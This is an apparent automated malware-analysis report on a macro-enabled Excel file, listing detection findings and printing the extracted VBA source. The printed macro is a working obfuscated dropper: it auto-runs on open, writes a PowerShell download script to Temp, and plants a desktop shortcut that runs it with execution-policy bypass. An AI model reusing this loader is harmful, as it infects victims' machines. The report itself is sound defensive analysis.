Verdict: MALICIOUS
Risk score: 260
Heuristics: 10
| Finding | Severity | Rule ID | Description | Matched line in script |
|---|---|---|---|---|
| VBA project inside OOXML (9 related findings) | medium | OOXML_VBA | Document contains a VBA project — VBA macros present | (none) |
| WScript.Shell usage | critical | OLE_VBA_WSCRIPT | WScript.Shell usage | `With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)` |
| Obfuscated auto-exec VBA loader | critical | OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER | Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. | `With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)` |
| CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject call | `With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)` |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below. | (none) |
| AutoOpen macro | low | OLE_VBA_AUTOOPEN | AutoOpen macro | `Sub AutoOpen()` |
| Document_Open macro | low | OLE_VBA_DOCOPEN | Document_Open macro | `Sub Document_Open()` |
| Workbook_Open macro | low | OLE_VBA_WBOPEN | Workbook_Open macro | `Sub Workbook_Open()` |
| Auto_Open macro | low | OLE_VBA_AUTO | Auto_Open macro | `Sub Auto_Open()` |
| Environ() call (env variable access) | low | OLE_VBA_ENVIRON | Environ() call (env variable access) | `var = "Invoke-Webabcduest hefghs:///favicon.icon appleFile " & Environ$("LOCALAPPDATA") & "\Temp\diagnostics.xlsx; " & Environ$("LOCALAPPDATA") & "\Temp\diagnostics.xlsx"` |
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5291 bytes | 0c44e0f8d3a3e2a03ada257d84a1edf39d0869081f52ff45304efdd5cf17e113 |
Preview script: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "Module1"
'Attribute VB_Name = "Module1"
Option Explicit
Private Const GENERIC_WRITE = &H40000000
Private Const GENERIC_READ = &H80000000
Private Const FILE_ATTRIBUTE_NORMAL = &H80
Private Const CREATE_ALWAYS = 2
Private Const OPEN_ALWAYS = 4
Private Const INVALID_HANDLE_VALUE = -1
Private Declare PtrSafe Function ReadFile Lib "kernel32" (ByVal hFile As Long, _
lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, _
lpNumberOfBytesRead As Long, ByVal lpOverlapped As Long) As Long
Private Declare PtrSafe Function CloseHandle Lib "kernel32" ( _
ByVal hObject As Long) As Long
Private Declare PtrSafe Function WriteFile Lib "kernel32" ( _
ByVal hFile As Long, lpBuffer As Any, _
ByVal nNumberOfBytesToWrite As Long, _
lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long
Private Declare PtrSafe Function CreateFile Lib "kernel32" _
Alias "CreateFileA" (ByVal lpFileName As String, _
ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, _
ByVal lpSecurityAttributes As Long, _
ByVal dwCreationDisposition As Long, _
ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) _
As Long
Private Declare PtrSafe Function FlushFileBuffers Lib "kernel32" ( _
ByVal hFile As Long) As Long
Public Function WriteStringToFile(FileName As String, ByVal TheData As String, _
Optional NoOverwrite As Boolean = False) As Boolean
Dim lHandle As Long
Dim lSuccess As Long
Dim lBytesWritten As Long, lBytesToWrite As Long
If NoOverwrite = True And Dir(FileName) <> "" Then Exit Function
lBytesToWrite = Len(TheData)
lHandle = CreateFile(FileName, GENERIC_WRITE Or GENERIC_READ, _
0, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0)
If lHandle <> INVALID_HANDLE_VALUE Then
lSuccess = WriteFile(lHandle, ByVal TheData, _
lBytesToWrite, lBytesWritten, 0) <> 0
If lSuccess <> 0 Then
lSuccess = FlushFileBuffers(lHandle)
lSuccess = CloseHandle(lHandle)
End If
End If
ErrorHandler:
WriteStringToFile = lSuccess <> 0
End Function
Public Function Jeez()
Dim decryptValue As String
Dim data() As String
Dim sAns As String
Dim tempPath As String
Dim sShortcutLocation As String
Dim targetPath As String
Dim arguments As String
Dim var As String
decryptValue = "ttpexereqershcom-outpss"
If "catsanddogs" = "catsanddogs" Then
var = "Invoke-Webabcduest hefghs:///favicon.icon appleFile " & Environ$("LOCALAPPDATA") & "\Temp\diagnostics.xlsx; " & Environ$("LOCALAPPDATA") & "\Temp\diagnostics.xlsx"
var = Replace(var, "efgh", Left(LCase(decryptValue), 3))
var = Replace(var, "abcd", Mid(LCase(decryptValue), 7, 3))
var = Replace(var, "xlsx", Mid(LCase(decryptValue), 4, 3))
var = Replace(var, "microsoft", Mid(LCase(decryptValue), 14, 3))
var = Replace(var, "apple", Mid(LCase(decryptValue), 17, 4))
sShortcutLocation = Environ$("USERPROFILE") & "\Desktop\GA17asa.lnk"
If "doglovescat" = "doglovescat" Then
tempPath = Environ$("LOCALAPPDATA") & "\Temp\malicious.ps1"
tempPath = Replace(tempPath, "netflix", Mid(LCase(decryptValue), 21, 3))
arguments = "-xlsxc bypass -File " & tempPath
arguments = Replace(arguments, "xlsx", Mid(LCase(decryptValue), 4, 3))
If "notfair" = "notfair" Then
targetPath = "C:\Windows\System32\Windowspowqwerell\v1.0\powqwerell.xlsx"
targetPath = Replace(targetPath, "xlsx", Mid(LCase(decryptValue), 4, 3))
targetPath = Replace(targetPath, "qwer", Mid(LCase(decryptValue), 10, 4))
Else
MsgBox "Dogsarecoolzzz!"
End If
End If
If "dogsandcats" = "dogsandcats" Then
With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)
.targetPath = targetPath
.Description = "rekins"
.arguments = arguments
.IconLocation = "%SystemRoot%\system32\shell32.dll, 3"
.Save
End With
WriteStringToFile tempPath, var
MsgBox "Dodieties uz darbavirsmu, lai apskatitu failus mape GA17332332"
Else
MsgBox "Dogsarecool!"
End If
Else
MsgBox "Dogsarecoolx!"
End If
End Function
Sub Auto_Open()
Jeez
End Sub
Sub AutoOpen()
Jeez
End Sub
Sub Workbook_Open()
Jeez
End Sub
Sub WorkbookOpen()
Jeez
End Sub
Sub Document_Open()
Jeez
End Sub
Sub DocumentOpen()
Jeez
End Sub
Attribute VB_Name = "Ši_darbgramata"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Lapa1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 34816 bytes | 1175dcba774d86bcc4437ca26cee36cb8c4d17f56af23e2b97d5c4b6e79255cb |